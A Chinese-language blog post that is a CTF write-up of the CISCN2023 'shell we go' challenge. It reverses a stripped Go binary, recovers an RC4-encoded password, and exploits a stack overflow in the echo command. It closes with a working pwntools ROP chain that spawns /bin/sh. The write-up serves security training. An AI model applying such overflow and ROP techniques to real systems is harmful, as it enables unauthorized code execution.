

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/four.jpg">
  <link rel="icon" href="/img/four.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="xtxtn">
  <meta name="keywords" content="">
  
    <meta name="description" content="在国赛上遇到的一道go语言的题，自己也是第一次遇到，在此记录一下复现的过程。 ​					 由于go语言编译都是静态的，而且程序把所有的符号表都去掉了，对于逆向的难度大大提升，虽然可以通过输出的字符串快速找到主函数，但是对于一些go语言的库函数根本就无法判断，分析这些库函数只会浪费大量时间；这里使用一下IDAGolangHelper，可以修复go的符号表。 进入程序后很快就想到输入常用的shell">
<meta property="og:type" content="article">
<meta property="og:title" content="CISCN2023 shell we go">
<meta property="og:url" content="https://xtxtn.github.io/2023/05/30/CISCN2023-shell-we-go/index.html">
<meta property="og:site_name" content="xtxtn&#39;s Blog">
<meta property="og:description" content="在国赛上遇到的一道go语言的题，自己也是第一次遇到，在此记录一下复现的过程。 ​					 由于go语言编译都是静态的，而且程序把所有的符号表都去掉了，对于逆向的难度大大提升，虽然可以通过输出的字符串快速找到主函数，但是对于一些go语言的库函数根本就无法判断，分析这些库函数只会浪费大量时间；这里使用一下IDAGolangHelper，可以修复go的符号表。 进入程序后很快就想到输入常用的shell">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://xtxtn.github.io/img/13/Screenshot%202023-05-30%20172622.png">
<meta property="og:image" content="https://xtxtn.github.io/img/13/Screenshot%202023-05-30%20173651.png">
<meta property="og:image" content="https://xtxtn.github.io/img/13/Screenshot%202023-05-30%20174350.png">
<meta property="og:image" content="https://xtxtn.github.io/img/13/Screenshot%202023-05-30%20184428.png">
<meta property="og:image" content="https://xtxtn.github.io/img/13/Screenshot%202023-05-30%20192441.png">
<meta property="og:image" content="https://xtxtn.github.io/img/13/Screenshot%202023-05-30%20192627.png">
<meta property="og:image" content="https://xtxtn.github.io/img/13/Screenshot%202023-05-30%20013458.png">
<meta property="og:image" content="https://xtxtn.github.io/img/13/Screenshot%202023-05-30%20201147.png">
<meta property="og:image" content="https://xtxtn.github.io/img/13/Screenshot%202023-05-30%20201330.png">
<meta property="article:published_time" content="2023-05-30T11:49:12.727Z">
<meta property="article:modified_time" content="2023-06-07T08:28:42.579Z">
<meta property="article:author" content="xtxtn">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://xtxtn.github.io/img/13/Screenshot%202023-05-30%20172622.png">
  
  
  
  <title>CISCN2023 shell we go - xtxtn&#39;s Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"xtxtn.github.io","root":"/","version":"1.9.3","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>xtxtn</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/th.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="CISCN2023 shell we go"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-05-30 19:49" pubdate>
          2023年5月30日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          2.3k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          19 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">CISCN2023 shell we go</h1>
            
            
              <div class="markdown-body">
                
                <p>在国赛上遇到的一道go语言的题，自己也是第一次遇到，在此记录一下复现的过程。</p>
<p>​					</p>
<p>由于go语言编译都是静态的，而且程序把所有的符号表都去掉了，对于逆向的难度大大提升，虽然可以通过输出的字符串快速找到主函数，但是对于一些go语言的库函数根本就无法判断，分析这些库函数只会浪费大量时间；这里使用一下<a target="_blank" rel="noopener" href="https://github.com/renshareck/IDAGolangHelper_SupportGo1.20">IDAGolangHelper</a>，可以修复go的符号表。</p>
<p>进入程序后很快就想到输入常用的shell命令，但是输出只有“Cert Is A Must”，查找”Cert“字符串可以看到还有一个”Cert complete, you can explore more“，说明需要输入一些东西认证：</p>
<img src="/img/13/Screenshot 2023-05-30 172622.png" srcset="/img/loading.gif" lazyload style="zoom:80%;" />

<p>​							</p>
<p>引用该字符串的函数为main_unk_func0b01，好像看不出什么东西：</p>
<img src="/img/13/Screenshot 2023-05-30 173651.png" srcset="/img/loading.gif" lazyload style="zoom: 80%;" />

<p>接着向上找引用main_unk_func0b01的函数，看到main_unk_func0b05函数，很快就发现伪代码中没有调用过main_unk_func0b01函数的痕迹：</p>
<img src="/img/13/Screenshot 2023-05-30 174350.png" srcset="/img/loading.gif" lazyload style="zoom: 67%;" />

<p>​					</p>
<p>直接查看该函数的汇编，果然ida7.7的伪代码功能对go无法准确识别。函数中下面的块全是cmp，将一些奇怪的16进制数变成字符串（需要逆序看），可以清晰地看到基本上全是一个先比较字符串长度，再去比较字符内容的一个过程，shell中不同指令的实现是将该过程重复多次来判断指令的内容，进而跳转到相应的地方去实现不同指令的功能：</p>
<img src="/img/13/Screenshot 2023-05-30 184428.png" srcset="/img/loading.gif" lazyload style="zoom: 50%;" />

<p>在cmp时，数据全是在rax的地址获取的，也很容易看到一个规律：[rax + i]为字符串的地址，[rax + i * 8]为字符串的大小，rax寄存器之前一次改变是在调用strings_genSplit函数后，通过gdb调试发现该函数通过空格来分割字符串，rax保存字符串分割后的信息，rbx是分割的块数：</p>
<p>​        <img src="/img/13/Screenshot 2023-05-30 192441.png" srcset="/img/loading.gif" lazyload style="zoom: 50%;" /></p>
<p>​											<img src="/img/13/Screenshot 2023-05-30 192627.png" srcset="/img/loading.gif" lazyload style="zoom:50%;" />		</p>
<p>​																									</p>
<p>接下来很多东西都可以顺利看懂了，想进入main_unk_func0b0函数，分割的块数为3，第一个字符串为”cert”，第二个字符串为”nAcDsMicN”，第三个字符串进入main_unk_func0b0函数后再去进一步比较。接下来再进入main_unk_func0b0分析，看到crypto_rc4_NewCipher、encoding_base64__ptr_Encoding_EncodeToString这些库函数，直接去网上搜一下，这些函数就是cr4加密后再进行base64编码，，最后与”JLIX8pbSvYZu&#x2F;WaG”比较，通过这个网站就可以解密：<a target="_blank" rel="noopener" href="https://www.lddgo.net/encrypt/rc4">https://www.lddgo.net/encrypt/rc4</a></p>
<img src="/img/13/Screenshot 2023-05-30 013458.png" srcset="/img/loading.gif" lazyload style="zoom:50%;" />

<p>​																					</p>
<p>输入”cert nAcDsMicN S33UAga1n@#!”后就能真正去使用这个shell，回过头去看main_unk_func0b05函数中比较的字符串，可以发现的指令有”ls”、”cd”、”cat”、”whoami”、”echo”、”exit”，其中只有”ls”和”cd”才能真正实现相应的功能，而cat匹配到flag时会输出一个假的flag(😦)，真正有用的是echo会进入main_unk_func0b04函数。</p>
<p>main_unk_func0b04函数中通过输入的字符串的大小（除空格）作为循环的大小，将其单个字节循环复制到栈中，这里是一个echo的栈溢出，main_unk_func0b04函数会先对每一个字符串块的大小进行检查，直接使用空格绕过即可：</p>
<img src="/img/13/Screenshot 2023-05-30 201147.png" srcset="/img/loading.gif" lazyload style="zoom:50%;" />

<p>而在临近rbp的部分存着复制过程中循环的大小与栈的相对基址，如果直接填充数据溢出的数据将其改变就会使复制数据失败，不能覆盖返回地址了，这里使用”+”这个字符可以不对让数据不复制到栈上，而循环的大小依然再增加：</p>
<img src="/img/13/Screenshot 2023-05-30 201330.png" srcset="/img/loading.gif" lazyload style="zoom: 50%;" />



<p>​																																			</p>
<p>exp:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span>*<br>elf = ELF(<span class="hljs-string">&#x27;pwn&#x27;</span>)<br>p = process(<span class="hljs-string">&#x27;./pwn&#x27;</span>)<br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br>context.arch = <span class="hljs-string">&#x27;amd64&#x27;</span><br><br>pop_rdi_ret = <span class="hljs-number">0x444fec</span><br>pop_rsi_ret = <span class="hljs-number">0x41e818</span><br>pop_rdx_ret = <span class="hljs-number">0x49e11d</span><br>pop_rax_ret = <span class="hljs-number">0x40d9e6</span><br>syscall_ret = <span class="hljs-number">0x4636e9</span><br>bss = <span class="hljs-number">0x5A2C88</span><br><br>p.sendlineafter(<span class="hljs-string">b&#x27;$&#x27;</span>, <span class="hljs-string">b&#x27;cert nAcDsMicN S33UAga1n@#!&#x27;</span>)<br><br>payload = p64(pop_rdi_ret) + p64(<span class="hljs-number">0</span>) + p64(pop_rsi_ret) + p64(bss) + p64(pop_rdx_ret) + p64(<span class="hljs-number">8</span>) + p64(pop_rax_ret) + p64(<span class="hljs-number">0</span>) + p64(syscall_ret)<br>payload += p64(pop_rdi_ret) + p64(bss) + p64(pop_rsi_ret) + p64(<span class="hljs-number">0</span>) + p64(pop_rdx_ret) + p64(<span class="hljs-number">0</span>) + p64(pop_rax_ret) + p64(<span class="hljs-number">0x3b</span>) + p64(syscall_ret)<br><br>p.sendlineafter(<span class="hljs-string">b&#x27;#&#x27;</span>, <span class="hljs-string">b&#x27;echo &#x27;</span> + <span class="hljs-string">b&#x27;a&#x27;</span> * (<span class="hljs-number">0x200</span> - <span class="hljs-number">0x100</span> - <span class="hljs-number">0xd</span>) + <span class="hljs-string">b&#x27; &#x27;</span> + <span class="hljs-string">b&#x27;b&#x27;</span> * <span class="hljs-number">0x110</span> + <span class="hljs-string">b&#x27;+&#x27;</span> * <span class="hljs-number">0x20</span> + payload)<br>p.send(<span class="hljs-string">b&#x27;/bin/sh\x00&#x27;</span>)<br>p.interactive()<br></code></pre></td></tr></table></figure>


                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>CISCN2023 shell we go</div>
      <div>https://xtxtn.github.io/2023/05/30/CISCN2023-shell-we-go/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>xtxtn</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2023年5月30日</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>更新于</div>
          <div>2023年6月7日</div>
        </div>
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
                <a target="_blank" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">
                  <span class="hint--top hint--rounded" aria-label="NC - 非商业性使用">
                    <i class="iconfont icon-nc"></i>
                  </span>
                </a>
              
                <a target="_blank" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">
                  <span class="hint--top hint--rounded" aria-label="SA - 相同方式共享">
                    <i class="iconfont icon-sa"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2023/06/27/sctf2023/" title="sctf2023 Brave Knights and Rusty Swords">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">sctf2023 Brave Knights and Rusty Swords</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/04/04/musl-pwn/" title="musl 1.2.2的两道pwn题">
                        <span class="hidden-mobile">musl 1.2.2的两道pwn题</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
